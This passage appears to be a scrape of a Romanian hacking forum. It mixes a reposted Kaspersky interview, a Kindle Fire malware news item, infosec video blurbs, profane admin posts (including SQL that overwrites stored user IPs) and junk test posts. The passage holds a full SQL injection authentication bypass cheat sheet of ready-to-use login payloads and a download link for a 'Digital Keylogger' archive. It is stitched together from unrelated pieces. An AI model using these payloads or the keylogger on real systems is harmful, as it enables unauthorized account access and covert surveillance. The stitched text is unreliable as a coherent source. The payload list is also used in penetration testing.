bothered disproving it here. I personally would never use a free antivirus, even if I didn’t work for Kaspersky Lab. I know how this type of software works, who works on these programs and how. Which antivirus manufacturers do you feel most envious of? Would you agree to work for them if they paid you enough? Alex Gostev: Well, I’m not envious of anyone. There are companies that I have respect for – these are primarily the companies that can make good use of the resources they have, both human and technical, where the work of the specialists makes me say: “How the hell did they find this before us or do a better job of analyzing than us!” This really stimulates competition, and, as a consequence, our level of expertise improves as well. In recent times, I’ve only seen this sort of interesting, motivating competition between us and Symantec. To be more precise, between Kaspersky’s team of experts (GReAT) and their STAR team. That said, we cooperate very closely with them on a number of research topics, and have good personal relationships with them. As for working for a different antivirus company – well, I think I’ve become too much of a Kaspersky man. I’d be more likely to change the IT security sphere for a different, but related area. Or set up my own business. How do you attract clever students and specialists to your company? Is there a chance they will later be recruited by secret services (foreign or Russian)? Or is this the first time you’ve heard about this? Alex Gostev: How we attract new employees is a business secret J As for being recruited by secret services, I didn’t in fact understand that one. Secret services can recruit anyone – taxi drivers, bakers, managers (ourselves not excluded), so what? Kaspersky Lab has its own security service, and its does a great job. This question is within their competence. When I was reverse engineering one of your products, namely Kaspersky CRYSTAL v12.0.1.288, I discovered the following comment: //I am not responsible for this code //I was forced to write it against my will This is an Easter egg, right? Alex Gostev: When programs get complied, the comments existing in the source code do not enter the final code – every programmer knows this. So you could not have obtained that by reverse engineering. Read about the prehistory of that case: polls - What is the best comment in source code you have ever encountered? - Stack Overflow Is a hardware firewall in the router enough? Or maybe, besides that, it's good to have a software firewall? Alex Gostev: The firewalls in modern routers are pretty limited in terms of their functionality, and perform primitive filtering at the level of port addresses. Naturally, this solution is not adequate for complete security. I want to ask about security in Linux. How does Kaspersky Lab approach this system from a security aspect? Do you study the number and geography of threats for Linux. Do such threats evolve in any way, and are they really dangerous? Linux users are convinced that they are secure, and malware does not pose any threat to them. You can read tons of comments like "I've got Linux, I'm secure". What do you think about this? Alex Gostev: There are far fewer attacks against Linux than Windows or even OS X, for that matter. The user base isn’t as large as Windows and so the target isn’t as attractive for attackers. There are vulnerabilities and other threats for Linux systems and have been since the beginning, but malware isn’t a major issue on Linux. Recently, I read that Android is the most unsafe mobile operating system. Do you agree? Which mobile OS is, in your opinion, the most secure? Alex Gostev: Yes, I agree that Android is the most vulnerable mobile platform. The safest is iOS. Stuxnet, Duqu, Flame and the latest Gauss have infected millions of computers, spying on their activities without the user realizing it. How is it possible that, despite the improvements antivirus products constantly make in detecting and blocking malware based on the behavior of executable files, Stuxnet and co. have not been noticed and detected? For example the spread via USB flash drive by autorun.inf using the CVE-2010-2568 vulnerability in the *.LNK file, or sending data to a remote server - how is this possible? What does Kaspersky Lab plan to do to fight cyber-espionage? What will be the next Gauss? Alex Gostev: First of all, the Duqu, Flame and Gauss incidents do not involve millions of computers – at most they affected thousands. In fact, Duqu and miniFlame only affected a few dozen computers. Second, we’re talking about programs that cost millions and that had input from dozens of people. These are not typical cyber threats – they are cutting-edge, complex threats. Obviously, learning how to reliably detect and block them takes time. It should be noted here that KL was the first company to detect and carry out in-depth analysis of them. We are the best in the world at detecting these sorts of threats – and that’s a fact. We’ll use the knowledge we’ve gained to seek out other similar threats. Why does Kaspersky slow my PC down so much? Alex Gostev: A good level of protection will always require some use of computer resources. There are software products out there that call themselves antivirus solutions and which operate faster than our product, but the level of protection they provide is nowhere near that offered by Kaspersky Lab. We don’t see the point of lowering the level of protection, because just one missed virus out of millions detected can cause a user major problems. We are constantly working on new technologies that will allow us to depart from older protection methods, such as the multi-level scanning of files. These technologies will use less computer resources, but also ensure the highest level of protection is maintained. What is the role of Cloud Protection in Kaspersky’s 2012 product versions? What are the pros besides the basic protection? Alex Gostev: The reaction time of the cloud to new threats is generally several times greater than that offered by traditional signature databases. Cloud protection is intended primarily to prevent the user being affected by the very latest threats. Your antivirus is useful against viruses and Trojans whose signatures are already known and the code is already recognized as malicious. What about “hand made” viruses with hidden code? Alex Gostev: Signature-based analysis is a tried-and-tested method of detecting threats, but on its own against today’s threats it’s virtually useless. That’s why our product uses behavioral analyzers capable of determining whether a program is behaving itself or not. When installing Kaspersky Anti-Virus together with another antivirus solution, why does Kaspersky tell you to remove them, but they don’t say anything about Kaspersky? I found this rather strange. Alex Gostev: To ensure a high level of protection and avoid any conflict with other programs, we recommend users uninstall all other antivirus products before installing our product. It is technically possible to have two or three antivirus solutions on one machine, but it will mean the computer is overloaded and will slow it down considerably. Why don’t you contact rutracker.org and tell them to stop distributing your products? Alex Gostev: Let them carry on – we don’t mind J Is Kaspersky Mobile Security good enough to protect my Android phone? Also, why are there different prices for KMS on Google Play and on kaspersky.com sites? Alex Gostev: Kaspersky Mobile Security is one of the best mobile AVs (and this is not just our opinion, PPCSL, AV-Test and other independent test agencies say the same). So, in answer to your first question, yes, it is. There are some differences between the update speeds on the GPlay and Kaspersky Lab websites and the tech support terms are also different (on GPlay you can get only limited support via email). When will a control plug-in for browsers be implemented in KAV or KIS? Alex Gostev: Is it really necessary? It’s much easier and more effective to open the product and make all the necessary changes there. If you’re talking about tuning the product settings, it is more effective to make all the necessary changes there. Also, we need to isolate our UI settings from malware and other processes to ensure the protection level. Today we download loads of free apps to our gadgets. Can the attacker take advantage and disguise them as Trojans to compromise our systems and break into other remote targets? Alex Gostev: There are indeed lots of Android Trojans spreading not only in the guise of legitimate apps but also embedded by malicious users in popular programs. To do this they create their own modifications of the original app package where the Trojan module is added. Here are some recent examples of this: Fake Android game apps sneak malware into Google Play - Technology & science - Security | NBC News Over 60% of Android Malware Hides in Fake Popular Apps and it’s also worth reading our report on mobile malware in 2012. Sursa: Interview with Kaspersky Chief Malware Expert Alex Gostev | threatpost

[h=1]Kaspersky Warns of Malware Targeting Kindle Fire[/h]By Jeff Goldman | December 24, 2012 Kaspersky's Roel Schouwenberg recently came across two fake apps in the Amazon App Store, "Internet Accelerator Speed Up" and "Shake Battery Charger," which claim to offer performance improvements, but don't do anything except deliver Airpush mobile ads. "It should come as no surprise that there are malicious apps in the Amazon App Store," Schouwenberg writes. "Amazon.com is incredibly popular and it's a very trivial step to also upload an app into their store. We detect these pieces of malware as HEUR:Hoax.AndroidOS.FakeBapp.a and have been in contact with Amazon.com about this. The apps were previously available in Google Play as well, but had been removed at an earlier time." "After a bit of online research, Schouwenberg found a Twitter account [matching the developer's name], and discovered that references in the app code to 'Bapplz' match references in the social feed," Infosecurity reports. "That in turn [led] to the discovery of a website called bapplz.com that hasn’t been updated since August. 'Clearly, the project seems abandoned even if it's still making the author some money,' he noted." Sursa: Kaspersky Warns of Malware Targeting Kindle Fire - eSecurity Planet

[h=2]SQL Injection Authentication Bypass Cheat Sheet[/h]This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin ?slam Tatl?If (OWASP Board Member).If you have any other suggestions please feel free to leave a comment in order to improve and expand the list. or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 Sursa: SQL Injection Authentication Bypass Cheat Sheet

Salut tex, A trecut mult timp, am auzit multe pareri si inca nu stiu sigur ce s-a intamplat, dar eu cred ca ar trebui schimbat radical sistemul judiciar din Romania deoarece stim cu totii ca este la pamant. Imi pare rau ca ti-ai petrecut Craciunul astfel, dar eu sunt sigur ca o sa fie bine deoarece tu nu ai nicio vina. E trist ca "militia" nu face diferenta intre un provider de hosting si un client al acestuia... A fost o lovitura pentru toti, poate din cauza alegerilor, poate din cauza ca vine sfarsitul de an si poate trebuia trasa o linie, nu avem de unde sa stim, dar cert este ca s-au facut greseli. Nu am vrut sa ma implic prea mult, deoarece sincer, imi este putina frica, mai ales ca am redeschis RST pentru a face un bine intregii comunitati si pentru a le arata ca nu ne dam batuti, insa fiind un administrator al "grupului organizat RST" am motivele mele sa ma tem. Ideea e ca suntem alaturi de tine si ca eu sunt sigur ca o sa iasa totul bine, sper doar sa nu se tot amane lucrurile cum am inteles ca s-a intamplat in multe cazuri. // Nytro

Cadouri de Craciun: Super-moderatori: - Cheater - M2G Administratori: - begood - em

Pula, daca lasam IP-ul 1.3.3.7 tuturor apareau probleme la logare. Asa ca alegem varianta taraneasca: $_SERVER['REMOTE_ADDR'] = (string)rand(1,254) . '.' . (string)rand(1,254) . '.' . (string)rand(1,254) . '.' . (string)rand(1,254);

Zzzzzzzzzzzzzzzzzzzzzzzzzzzzzz

sdfdsfdsfdsdsf

Nu e el.

Pentru a sta linistiti toti paranoicii, adica cei care se cred importanti desi nu da nimeni doi bani pe ce (nu) au facut ei, de aceste sarbatori, intre Craciun si Revelion, nu vor fi salvate IP-uri: mysql> update post set ipaddress = '1.3.3.7'; Query OK, 390557 rows affected (18.36 sec) Rows matched: 390562 Changed: 390557 Warnings: 0 mysql> update user set ipaddress = '1.3.3.7'; Query OK, 99168 rows affected (1.55 sec) Rows matched: 99169 Changed: 99168 Warnings: 0 Dupa Revelion, daca tot mancati cacat ca cine stie ce ati facut, invatati sa folositi Tor, VPN-uri sau orice altceva. Muie. Adica Craciun fericit.

Test

Digital Keylogger v4.0.zip - Speedy Share - upload your files here

Da voi ce pula mea faceti?

Effective Approaches To Web Application Security Description: Abstract This presentation will focus on new and interesting approaches to web application security problems posed by a continuous deployment environment. Specifically, this presentation will cover useful security systems such as automatic vulnerability and application fault detection, effective platform defenses for XSS/SQLi, practical security alerting mechanisms, and visualizations of security related data. This talk demonstrates how to create these systems using free tools that improve security posture without commercial security products. ***** Speaker: Zane Lackey, Security Engineer Manager, Etsy Zane Lackey leads the security groups at Etsy, the world’s marketplace of creative independent businesses. Prior to Etsy, Zane was a Senior Security Consultant at iSEC Partners with a focus in the fields of mobile and web application security. His research has been featured in notable media outlets such as the BBC, Associated Press, Forbes, Wired, CNET, SC Magazine and numerous others. A frequent speaker at top industry conferences, he has presented at BlackHat, RSA, Microsoft BlueHat, Toorcon, DeepSec, SANS, OWASP, guest lectured at NYU, and in 2010 was named as one of 12 prominent security researchers by Network World magazine. He is a contributing author of Mobile Application Security (McGraw-Hill), a co-author of Hacking Exposed: Web 2.0 (McGraw-Hill), and a contributing author/technical editor of Hacking VoIP (No Starch Press). He holds a Bachelor of Arts in Economics with a minor in Computer Science from the University of California, Davis. ***** Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Effective Approaches to Web Application Security - Zane Lackey on Vimeo Sursa: Effective Approaches To Web Application Security

Cyberspace And Beyond - Evolution In Action Description: PDF : - https://hacktivity.com/en/downloads/archives/221/ Sir David Pepper was the Director of the Government Communications Headquarters (GCHQ) – the UK Government’s agency responsible for Signals Intelligence and electronic information security. He retired in July 2008, having taken up that post in April 2003. After taking a degree in Physics and a DPhil in Theoretical Physics at St John’s College, Oxford, he joined GCHQ in 1972. He spent all his career there except for a spell in the Home Office in 1998-2000, where he was responsible for infrastructure and modernisation. Much of his time at GCHQ was spent managing intelligence production, but he also had spells as Finance Director and HR Director. As the Director, his focus was on leading transformational change, as GCHQ responded to the challenges of the Internet both in intelligence production and in meeting the new problems of cyber-security. Since retiring from GCHQ, he has been a member of the previous UK Government’s National Security Forum, and held other non-executive positions including a role with Gloucestershire County Council. He is currently a member of the Advisory Board of Thales UK, and works with Deloitte on cyber risk and national security issues. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Cyberspace And Beyond - Evolution In Action